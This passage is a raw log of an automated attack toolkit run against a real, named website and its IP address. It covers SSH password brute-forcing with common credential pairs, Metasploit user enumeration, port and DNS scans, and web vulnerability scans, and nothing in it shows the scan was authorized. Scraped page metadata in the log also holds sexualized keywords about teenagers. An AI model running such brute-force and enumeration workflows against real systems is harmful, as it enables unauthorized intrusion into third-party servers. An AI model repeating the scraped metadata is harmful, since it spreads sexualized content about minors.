1199. NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
1200. NSE: [ssh-brute] Trying username/password pair: netadmin:justin
1201. NSE: [ssh-brute] Trying username/password pair: guest:justin
1202. NSE: [ssh-brute] Trying username/password pair: user:justin
1203. NSE: [ssh-brute] Trying username/password pair: web:justin
1204. NSE: [ssh-brute] Trying username/password pair: test:justin
1205. NSE: [ssh-brute] Trying username/password pair: root:liverpool
1206. NSE: [ssh-brute] Trying username/password pair: admin:liverpool
1207. NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
1208. NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
1209. NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
1210. NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
1211. NSE: [ssh-brute] Trying username/password pair: guest:liverpool
1212. NSE: [ssh-brute] Trying username/password pair: user:liverpool
1213. NSE: [ssh-brute] Trying username/password pair: web:liverpool
1214. NSE: [ssh-brute] Trying username/password pair: test:liverpool
1215. NSE: [ssh-brute] Trying username/password pair: root:football
1216. NSE: [ssh-brute] Trying username/password pair: admin:football
1217. NSE: [ssh-brute] Trying username/password pair: administrator:football
1218. NSE: [ssh-brute] Trying username/password pair: webadmin:football
1219. NSE: [ssh-brute] Trying username/password pair: sysadmin:football
1220. NSE: [ssh-brute] Trying username/password pair: netadmin:football
1221. NSE: [ssh-brute] Trying username/password pair: guest:football
1222. NSE: [ssh-brute] Trying username/password pair: user:football
1223. NSE: [ssh-brute] Trying username/password pair: web:football
1224. NSE: [ssh-brute] Trying username/password pair: test:football
1225. NSE: [ssh-brute] Trying username/password pair: root:loveme
1226. NSE: [ssh-brute] Trying username/password pair: admin:loveme
1227. NSE: [ssh-brute] Trying username/password pair: administrator:loveme
1228. NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
1229. NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
1230. NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
1231. NSE: [ssh-brute] Trying username/password pair: guest:loveme
1232. NSE: [ssh-brute] Trying username/password pair: user:loveme
1233. NSE: [ssh-brute] Trying username/password pair: web:loveme
1234. NSE: [ssh-brute] Trying username/password pair: test:loveme
1235. NSE: [ssh-brute] Trying username/password pair: root:secret
1236. NSE: [ssh-brute] Trying username/password pair: admin:secret
1237. NSE: [ssh-brute] Trying username/password pair: administrator:secret
1238. NSE: [ssh-brute] Trying username/password pair: webadmin:secret
1239. NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
1240. NSE: [ssh-brute] Trying username/password pair: netadmin:secret
1241. NSE: [ssh-brute] Trying username/password pair: guest:secret
1242. NSE: [ssh-brute] Trying username/password pair: user:secret
1243. NSE: [ssh-brute] Trying username/password pair: web:secret
1244. NSE: [ssh-brute] Trying username/password pair: test:secret
1245. NSE: [ssh-brute] Trying username/password pair: root:andrea
1246. NSE: [ssh-brute] Trying username/password pair: admin:andrea
1247. NSE: [ssh-brute] Trying username/password pair: administrator:andrea
1248. NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
1249. NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
1250. NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
1251. NSE: [ssh-brute] Trying username/password pair: guest:andrea
1252. NSE: [ssh-brute] Trying username/password pair: user:andrea
1253. NSE: [ssh-brute] Trying username/password pair: web:andrea
1254. NSE: [ssh-brute] Trying username/password pair: test:andrea
1255. NSE: [ssh-brute] Trying username/password pair: root:jennifer
1256. NSE: [ssh-brute] Trying username/password pair: admin:jennifer
1257. NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
1258. NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
1259. NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
1260. NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
1261. NSE: [ssh-brute] Trying username/password pair: guest:jennifer
1262. NSE: [ssh-brute] Trying username/password pair: user:jennifer
1263. NSE: [ssh-brute] Trying username/password pair: web:jennifer
1264. NSE: [ssh-brute] Trying username/password pair: test:jennifer
1265. NSE: [ssh-brute] Trying username/password pair: root:joshua
1266. NSE: [ssh-brute] Trying username/password pair: admin:joshua
1267. NSE: [ssh-brute] Trying username/password pair: administrator:joshua
1268. NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
1269. NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
1270. NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
1271. NSE: [ssh-brute] Trying username/password pair: guest:joshua
1272. NSE: [ssh-brute] Trying username/password pair: user:joshua
1273. NSE: [ssh-brute] Trying username/password pair: web:joshua
1274. NSE: [ssh-brute] Trying username/password pair: test:joshua
1275. NSE: [ssh-brute] Trying username/password pair: root:carlos
1276. NSE: [ssh-brute] Trying username/password pair: admin:carlos
1277. NSE: [ssh-brute] Trying username/password pair: administrator:carlos
1278. NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
1279. NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
1280. Nmap scan report for nn-stars.net (93.174.91.164)
1281. Host is up (0.12s latency).
1282. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
1283.  
1284. PORT STATE SERVICE VERSION
1285. 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
1286. | ssh-auth-methods:
1287. | Supported authentication methods:
1288. | publickey
1289. |_ password
1290. | ssh-brute:
1291. | Accounts: No valid accounts found
1292. |_ Statistics: Performed 465 guesses in 181 seconds, average tps: 2.7
1293. | ssh-hostkey:
1294. | 1024 ab:16:56:89:21:7e:75:1c:77:f3:a2:7e:c2:f1:4c:09 (DSA)
1295. | 2048 22:f8:e3:f6:1a:1c:6a:99:09:6b:1e:7c:fd:30:e3:95 (RSA)
1296. |_ 256 a8:03:f4:96:36:d1:39:de:2e:4f:56:e9:0f:f3:63:56 (ECDSA)
1297. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
1298. |_ssh-run: Failed to specify credentials and command to run.
1299. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1300. Aggressive OS guesses: Linux 2.6.39 (95%), Linux 3.2.0 (95%), Linux 3.2 - 3.8 (94%), Linux 3.8 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.1 - 3.2 (93%), Linux 3.5 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 3.0 - 3.2 (91%)
1301. No exact OS matches for host (test conditions non-ideal).
1302. Network Distance: 7 hops
1303. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1304.  
1305. TRACEROUTE (using port 22/tcp)
1306. HOP RTT ADDRESS
1307. 1 109.36 ms 10.13.0.1
1308. 2 ...
1309. 3 109.39 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
1310. 4 ...
1311. 5 116.10 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
1312. 6 ...
1313. 7 115.39 ms no-reverse-dns-configured.com (93.174.91.164)
1314.  
1315.  
1316. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
1317. RHOSTS => nn-stars.net
1318. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
1319. RHOST => nn-stars.net
1320. [*] 93.174.91.164:22 - SSH - Checking for false positives
1321. [*] 93.174.91.164:22 - SSH - Starting scan
1322. [-] 93.174.91.164:22 - SSH - User 'admin' not found
1323. [-] 93.174.91.164:22 - SSH - User 'administrator' not found
1324. [-] 93.174.91.164:22 - SSH - User 'anonymous' not found
1325. [-] 93.174.91.164:22 - SSH - User 'backup' not found
1326. [-] 93.174.91.164:22 - SSH - User 'bee' not found
1327. [-] 93.174.91.164:22 - SSH - User 'ftp' not found
1328. [+] 93.174.91.164:22 - SSH - User 'guest' found
1329. [+] 93.174.91.164:22 - SSH - User 'GUEST' found
1330. [-] 93.174.91.164:22 - SSH - User 'info' not found
1331. [-] 93.174.91.164:22 - SSH - User 'mail' not found
1332. [-] 93.174.91.164:22 - SSH - User 'mailadmin' not found
1333. [-] 93.174.91.164:22 - SSH - User 'msfadmin' not found
1334. [-] 93.174.91.164:22 - SSH - User 'mysql' not found
1335. [-] 93.174.91.164:22 - SSH - User 'nobody' not found
1336. [-] 93.174.91.164:22 - SSH - User 'oracle' not found
1337. [-] 93.174.91.164:22 - SSH - User 'owaspbwa' not found
1338. [-] 93.174.91.164:22 - SSH - User 'postfix' not found
1339. [-] 93.174.91.164:22 - SSH - User 'postgres' not found
1340. [-] 93.174.91.164:22 - SSH - User 'private' not found
1341. [-] 93.174.91.164:22 - SSH - User 'proftpd' not found
1342. [-] 93.174.91.164:22 - SSH - User 'public' not found
1343. [-] 93.174.91.164:22 - SSH - User 'root' not found
1344. [-] 93.174.91.164:22 - SSH - User 'superadmin' not found
1345. [-] 93.174.91.164:22 - SSH - User 'support' not found
1346. [-] 93.174.91.164:22 - SSH - User 'sys' not found
1347. [-] 93.174.91.164:22 - SSH - User 'system' not found
1348. [-] 93.174.91.164:22 - SSH - User 'systemadmin' not found
1349. [-] 93.174.91.164:22 - SSH - User 'systemadministrator' not found
1350. [-] 93.174.91.164:22 - SSH - User 'test' not found
1351. [-] 93.174.91.164:22 - SSH - User 'tomcat' not found
1352. [-] 93.174.91.164:22 - SSH - User 'user' not found
1353. [-] 93.174.91.164:22 - SSH - User 'webmaster' not found
1354. [-] 93.174.91.164:22 - SSH - User 'www-data' not found
1355. [-] 93.174.91.164:22 - SSH - User 'Fortimanager_Access' not found
1356. [*] Scanned 1 of 1 hosts (100% complete)
1357. [*] Auxiliary module execution completed
1358. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
1359. [+] 93.174.91.164:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u6 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
1360. [*] nn-stars.net:22 - Scanned 1 of 1 hosts (100% complete)
1361. [*] Auxiliary module execution completed
1362.  + -- --=[Port 23 closed... skipping.
1363.  + -- --=[Port 25 closed... skipping.
1364.  + -- --=[Port 53 opened... running tests...
1365.  
1366. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:16 EDT
1367. Nmap scan report for nn-stars.net (93.174.91.164)
1368. Host is up (0.024s latency).
1369. rDNS record for 93.174.91.164: no-reverse-dns-configured.com
1370.  
1371. PORT STATE SERVICE VERSION
1372. 53/udp open domain ISC BIND (Fake version: 9.8.4-rpz2+rl005.12-P1)
1373. |_dns-cache-snoop: 0 of 100 tested domains are cached.
1374. |_dns-fuzz: The server seems impervious to our assault.
1375. | dns-nsec-enum:
1376. |_ No NSEC records found
1377. | dns-nsec3-enum:
1378. |_ DNSSEC NSEC3 not supported
1379. | dns-nsid:
1380. |_ bind.version: 9.8.4-rpz2+rl005.12-P1
1381. Too many fingerprints match this host to give specific OS details
1382. Network Distance: 7 hops
1383.  
1384. Host script results:
1385. | dns-blacklist:
1386. | SPAM
1387. |_ l2.apews.org - SPAM
1388. | dns-brute:
1389. | DNS Brute-force hostnames:
1390. |_ www.nn-stars.net - 93.174.91.164
1391.  
1392. TRACEROUTE (using proto 1/icmp)
1393. HOP RTT ADDRESS
1394. 1 108.70 ms 10.13.0.1
1395. 2 ...
1396. 3 108.73 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
1397. 4 111.35 ms 10.95.33.10
1398. 5 115.59 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
1399. 6 ...
1400. 7 136.39 ms no-reverse-dns-configured.com (93.174.91.164)
1401.  
1402. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1403. Nmap done: 1 IP address (1 host up) scanned in 616.20 seconds
1404.  + -- --=[Port 79 closed... skipping.
1405.  + -- --=[Port 80 opened... running tests...
1406.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
1407.  
1408. ^ ^
1409. _ __ _ ____ _ __ _ _ ____
1410. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1411. | V V // o // _/ | V V // 0 // 0 // _/
1412. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1413. <
1414. ...'
1415.  
1416. WAFW00F - Web Application Firewall Detection Tool
1417.  
1418. By Sandro Gauci && Wendel G. Henrique
1419.  
1420. Checking http://nn-stars.net
1421. Generic Detection results:
1422. No WAF detected by the generic detection
1423. Number of requests: 13
1424.  
1425.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
1426. http://nn-stars.net [200 OK] Cookies[from,idcheck,index_page,lfrom,vs], Country[NETHERLANDS][NL], HTTPServer[nginx], IP[93.174.91.164], PHP[5.4.45-0+deb7u8], Title[sexy teenspictures, teen angie], X-Powered-By[PHP/5.4.45-0+deb7u8], nginx
1427.  
1428.  __ ______ _____ 
1429.  \ \/ / ___|_ _|
1430.  \ /\___ \ | | 
1431.  / \ ___) || | 
1432.  /_/\_|____/ |_| 
1433.  
1434. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1435. + -- --=[Target: nn-stars.net:80
1436. + -- --=[Site not vulnerable to Cross-Site Tracing!
1437. + -- --=[Site not vulnerable to Host Header Injection!
1438. + -- --=[Site vulnerable to Cross-Frame Scripting!
1439. + -- --=[Site vulnerable to Clickjacking!
1440.  
1441. HTTP/1.1 405 Not Allowed
1442. Server: nginx
1443. Date: Fri, 27 Oct 2017 06:30:22 GMT
1444. Content-Type: text/html
1445. Content-Length: 166
1446. Connection: close
1447.  
1448. <html>
1449. <head><title>405 Not Allowed</title></head>
1450. <body bgcolor="white">
1451. <center><h1>405 Not Allowed</h1></center>
1452. <hr><center>nginx</center>
1453. </body>
1454. </html>
1455. 
1456. HTTP/1.1 200 OK
1457. Server: nginx
1458. Date: Fri, 27 Oct 2017 06:30:22 GMT
1459. Content-Type: text/html
1460. Transfer-Encoding: chunked
1461. Connection: keep-alive
1462. Vary: Accept-Encoding
1463. X-Powered-By: PHP/5.4.45-0+deb7u8
1464. Set-Cookie: from=spiders; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
1465. Set-Cookie: lfrom=spiders; expires=Fri, 03-Nov-2017 06:30:22 GMT; path=/
1466. Set-Cookie: idcheck=1509085822; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
1467. Set-Cookie: vs=spiders%7C; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
1468. Set-Cookie: index_page=1; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
1469. Vary: Accept-Encoding
1470.  
1471. 1dcd
1472. <html>
1473.  
1474. <head>
1475.  
1476. <base target="_blank">
1477.  
1478. <meta name="rating" content="general" />
1479.  
1480. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
1481.  
1482. <link href="./css/home.css" rel="stylesheet" type="text/css" />
1483.  
1484. <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0" />
1485.  
1486. <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
1487.  
1488. <me
1489.  
1490.  
1491.  
1492.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
1493. + -- --=[Checking if X-Content options are enabled on nn-stars.net... 
1494.  
1495. + -- --=[Checking if X-Frame options are enabled on nn-stars.net... 
1496.  
1497. + -- --=[Checking if X-XSS-Protection header is enabled on nn-stars.net... 
1498.  
1499. + -- --=[Checking HTTP methods on nn-stars.net... 
1500.  
1501. + -- --=[Checking if TRACE method is enabled on nn-stars.net... 
1502.  
1503. + -- --=[Checking for META tags on nn-stars.net... 
1504. <meta name="rating" content="general" />
1505. <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0" />
1506. <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
1507. <meta name="description" content=" lovely teen movs, teen models shop, girls teens with, pictures make people, teen models from, models teenage nymphets, action sexy teen, girls tube sites, siteslovely teen movs, brunette latina teen" />
1508. <meta name="keywords" content=" young virgin, teen posing, movie small, couples pictures, newry teenager, teens hundreds, california teen" />
1509. <meta name="revisit-after" content="3 days" />
1510. <meta name="robots" content="index, follow" />
1511. <meta name="language" content="en" />
1512.  
1513. + -- --=[Checking for open proxy on nn-stars.net... 
1514. <html><body><h1>It works!</h1>
1515. <p>This is the default web page for this server.</p>
1516. <p>The web server software is running but no content has been added, yet.</p>
1517. </body></html>
1518.  
1519. + -- --=[Enumerating software on nn-stars.net... 
1520. Server: nginx
1521. X-Powered-By: PHP/5.4.45-0+deb7u8
1522.  
1523. + -- --=[Checking if Strict-Transport-Security is enabled on nn-stars.net... 
1524.  
1525. + -- --=[Checking for Flash cross-domain policy on nn-stars.net... 
1526. index.html
1527. + -- --=[Checking for Silverlight cross-domain policy on nn-stars.net... 
1528. index.html
1529. + -- --=[Checking for HTML5 cross-origin resource sharing on nn-stars.net... 
1530.  
1531. + -- --=[Retrieving robots.txt on nn-stars.net... 
1532. index.html
1533. + -- --=[Retrieving sitemap.xml on nn-stars.net... 
1534. index.html
1535. + -- --=[Checking cookie attributes on nn-stars.net... 
1536. Set-Cookie: index_page=1; expires=Sat, 28-Oct-2017 06:30:30 GMT; path=/
1537.  
1538. + -- --=[Checking for ASP.NET Detailed Errors on nn-stars.net... 
1539.  
1540. 
1541.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
1542. - Nikto v2.1.6
1543. ---------------------------------------------------------------------------
1544. + Target IP: 93.174.91.164
1545. + Target Hostname: nn-stars.net
1546. + Target Port: 80
1547. + Start Time: 2017-10-27 02:26:44 (GMT-4)
1548. ---------------------------------------------------------------------------
1549. + Server: nginx
1550. + Cookie from created without the httponly flag
1551. + Cookie lfrom created without the httponly flag
1552. + Cookie idcheck created without the httponly flag
1553. + Cookie vs created without the httponly flag
1554. + Cookie index_page created without the httponly flag
1555. + Retrieved x-powered-by header: PHP/5.4.45-0+deb7u8
1556. + The anti-clickjacking X-Frame-Options header is not present.
1557. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1558. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
1559. + No CGI Directories found (use '-C all' to force check all possible dirs)
1560. + Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x52e0bbeb 0x200
1561. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
1562. + Cookie PHPSESSID created without the httponly flag
1563. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
1564. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
1565. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
1566. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
1567. + OSVDB-3233: /icons/README: Apache default file found.
1568. + 7446 requests: 0 error(s) and 17 item(s) reported on remote host
1569. + End Time: 2017-10-27 02:48:55 (GMT-4) (1331 seconds)
1570. ---------------------------------------------------------------------------
1571. + 1 host(s) tested
1572.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
1573. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/nn-stars.net-port80.jpg
1574.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
1575.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
1576.  
1577.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
1578.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
1579.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
1580.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
1581.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
1582.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
1583.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
1584.  
1585. __[ ! ] Neither war between hackers, nor peace for the system.
1586. __[ ! ] http://blog.inurl.com.br
1587. __[ ! ] http://fb.com/InurlBrasil
1588. __[ ! ] http://twitter.com/@googleinurl
1589. __[ ! ] http://github.com/googleinurl
1590. __[ ! ] Current PHP version::[ 7.0.22-3 ]
1591. __[ ! ] Current script owner::[ root ]
1592. __[ ! ] Current uname::[ Linux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) x86_64 ]
1593. __[ ! ] Current pwd::[ /usr/share/sniper ]
1594. __[ ! ] Help: php inurlbr.php --help
1595. ------------------------------------------------------------------------------------------------------------------------
1596.  
1597. [ ! ] Starting SCANNER INURLBR 2.1 at [27-10-2017 02:51:02]
1598. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1599. It is the end user's responsibility to obey all applicable local, state and federal laws.
1600. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1601.  
1602. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-nn-stars.net.txt ]
1603. [ INFO ][ DORK ]::[ site:nn-stars.net ]
1604. [ INFO ][ SEARCHING ]:: {
1605. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.fr ]
1606.  
1607. [ INFO ][ SEARCHING ]:: 
1608. -[:::]
1609. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1610.  
1611. [ INFO ][ SEARCHING ]:: 
1612. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1613. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.gh ID: 002901626849897788481:cpnctza84gq ]
1614.  
1615. [ INFO ][ SEARCHING ]:: 
1616. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1617.  
1618. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
1619. [ INFO ] Not a satisfactory result was found!
1620.  
1621.  
1622. [ INFO ] [ Shutting down ]
1623. [ INFO ] [ End of process INURLBR at [27-10-2017 02:51:12]
1624. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1625. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-nn-stars.net.txt ]
1626. |_________________________________________________________________________________________
1627.  
1628. \_________________________________________________________________________________________/
1629.  
1630.  + -- --=[Port 110 closed... skipping.
1631.  + -- --=[Port 111 opened... running tests...
1632.  + -- --=[Port 135 closed... skipping.
1633.  + -- --=[Port 139 closed... skipping.
1634.  + -- --=[Port 161 closed... skipping.
1635.  + -- --=[Port 162 closed... skipping.
1636.  + -- --=[Port 389 closed... skipping.
1637.  + -- --=[Port 443 closed... skipping.
1638.  + -- --=[Port 445 closed... skipping.
1639.  + -- --=[Port 512 closed... skipping.
1640.  + -- --=[Port 513 closed... skipping.
1641.  + -- --=[Port 514 closed... skipping.
1642.  + -- --=[Port 623 closed... skipping.
1643.  + -- --=[Port 624 closed... skipping.
1644.  + -- --=[Port 1099 closed... skipping.
1645.  + -- --=[Port 1433 closed... skipping.
1646.  + -- --=[Port 2049 closed... skipping.
1647.  + -- --=[Port 2121 closed... skipping.
1648.  + -- --=[Port 3306 closed... skipping.
1649.  + -- --=[Port 3310 closed... skipping.
1650.  + -- --=[Port 3128 closed... skipping.
1651.  + -- --=[Port 3389 closed... skipping.
1652.  + -- --=[Port 3632 closed... skipping.
1653.  + -- --=[Port 4443 closed... skipping.
1654.  + -- --=[Port 5432 closed... skipping.
1655.  + -- --=[Port 5800 closed... skipping.
1656.  + -- --=[Port 5900 closed... skipping.
1657.  + -- --=[Port 5984 closed... skipping.
1658.  + -- --=[Port 6000 closed... skipping.
1659.  + -- --=[Port 6667 closed... skipping.
1660.  + -- --=[Port 8000 closed... skipping.
1661.  + -- --=[Port 8100 closed... skipping.
1662.  + -- --=[Port 8080 closed... skipping.
1663.  + -- --=[Port 8180 closed... skipping.
1664.  + -- --=[Port 8443 closed... skipping.
1665.  + -- --=[Port 8888 closed... skipping.
1666.  + -- --=[Port 10000 closed... skipping.
1667.  + -- --=[Port 16992 closed... skipping.
1668.  + -- --=[Port 27017 closed... skipping.
1669.  + -- --=[Port 27018 closed... skipping.
1670.  + -- --=[Port 27019 closed... skipping.
1671.  + -- --=[Port 28017 closed... skipping.
1672.  + -- --=[Port 49152 closed... skipping.
1673.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
1674. #########################################################################################
1675. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
1676. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
1677. `888. .8' .88888. Y88bo. 888 8 888 888
1678. `888.8' .8' `888. `ZY8888o. 888 8 888 888
1679. `888' .88ooo8888. `0Y88b 888 8 888 888
1680. 888 .8' `888. oo .d8P `88. .8' `88b d88'
1681. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
1682. Welcome to Yasuo v2.3
1683. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
1684. #########################################################################################
1685.  
1686. I, [2017-10-27T02:51:15.351610 #23874] INFO -- : Initiating port scan
1687. I, [2017-10-27T02:51:18.650912 #23874] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-27_02-51-15.xml
1688.  + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
1689.  
1690. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:51 EDT
1691. NSE: Loaded 42 scripts for scanning.
1692. Initiating Parallel DNS resolution of 1 host. at 02:51
1693. Completed Parallel DNS resolution of 1 host. at 02:51, 0.06s elapsed
1694. Initiating SYN Stealth Scan at 02:51
1695. Scanning nn-stars.net (93.174.91.164) [65355 ports]
1696. Increasing send delay for 93.174.91.164 from 0 to 5 due to 11 out of 25 dropped probes since last increase.
1697. Discovered open port 80/tcp on 93.174.91.164
1698. Discovered open port 22/tcp on 93.174.91.164
1699. Discovered open port 53/tcp on 93.174.91.164
1700. Discovered open port 111/tcp on 93.174.91.164
1701. Discovered open port 21/tcp on 93.174.91.164
1702. Increasing send delay for 93.174.91.164 from 5 to 10 due to 97 out of 242 dropped probes since last increase.
1703. SYN Stealth Scan Timing: About 0.47% done
1704. Warning: 93.174.91.164 giving up on port because retransmission cap hit (6).
1705. SYN Stealth Scan Timing: About 0.72% done
1706. SYN Stealth Scan Timing: About 1.05% done; ETC: 05:16 (2:23:28 remaining)
1707. SYN Stealth Scan Timing: About 1.28% done; ETC: 05:28 (2:35:14 remaining)
1708. SYN Stealth Scan Timing: About 1.57% done; ETC: 05:37 (2:43:44 remaining)
1709. SYN Stealth Scan Timing: About 2.06% done; ETC: 05:29 (2:35:16 remaining)
1710. SYN Stealth Scan Timing: About 2.87% done; ETC: 05:02 (2:07:25 remaining)
1711. SYN Stealth Scan Timing: About 3.52% done; ETC: 04:52 (1:56:52 remaining)
1712. SYN Stealth Scan Timing: About 4.23% done; ETC: 04:46 (1:50:13 remaining)
1713. SYN Stealth Scan Timing: About 6.86% done; ETC: 04:43 (1:44:02 remaining)
1714. SYN Stealth Scan Timing: About 8.53% done; ETC: 04:38 (1:37:49 remaining)
1715. SYN Stealth Scan Timing: About 10.94% done; ETC: 04:34 (1:32:10 remaining)
1716. SYN Stealth Scan Timing: About 13.59% done; ETC: 04:31 (1:26:55 remaining)
1717. SYN Stealth Scan Timing: About 15.24% done; ETC: 04:27 (1:21:36 remaining)
1718. SYN Stealth Scan Timing: About 17.27% done; ETC: 04:24 (1:16:43 remaining)
1719. SYN Stealth Scan Timing: About 19.63% done; ETC: 04:20 (1:11:55 remaining)
1720. SYN Stealth Scan Timing: About 22.27% done; ETC: 04:18 (1:07:26 remaining)
1721. SYN Stealth Scan Timing: About 24.73% done; ETC: 04:15 (1:03:04 remaining)
1722. SYN Stealth Scan Timing: About 28.34% done; ETC: 04:13 (0:58:51 remaining)
1723. SYN Stealth Scan Timing: About 31.04% done; ETC: 04:10 (0:54:41 remaining)
1724. SYN Stealth Scan Timing: About 34.05% done; ETC: 04:08 (0:50:40 remaining)
1725. SYN Stealth Scan Timing: About 37.29% done; ETC: 04:05 (0:46:47 remaining)
1726. SYN Stealth Scan Timing: About 40.80% done; ETC: 04:03 (0:42:59 remaining)
1727. SYN Stealth Scan Timing: About 44.21% done; ETC: 04:01 (0:39:19 remaining)
1728. SYN Stealth Scan Timing: About 48.20% done; ETC: 04:00 (0:35:45 remaining)
1729. SYN Stealth Scan Timing: About 53.59% done; ETC: 04:00 (0:32:16 remaining)
1730. SYN Stealth Scan Timing: About 59.00% done; ETC: 04:01 (0:28:47 remaining)
1731. SYN Stealth Scan Timing: About 64.19% done; ETC: 04:01 (0:25:12 remaining)
1732. SYN Stealth Scan Timing: About 69.49% done; ETC: 04:02 (0:21:38 remaining)
1733. SYN Stealth Scan Timing: About 74.24% done; ETC: 04:01 (0:18:00 remaining)
1734. SYN Stealth Scan Timing: About 78.89% done; ETC: 03:59 (0:14:27 remaining)
1735. SYN Stealth Scan Timing: About 83.73% done; ETC: 03:58 (0:10:57 remaining)
1736. SYN Stealth Scan Timing: About 88.74% done; ETC: 03:58 (0:07:33 remaining)
1737. Discovered open port 44601/tcp on 93.174.91.164
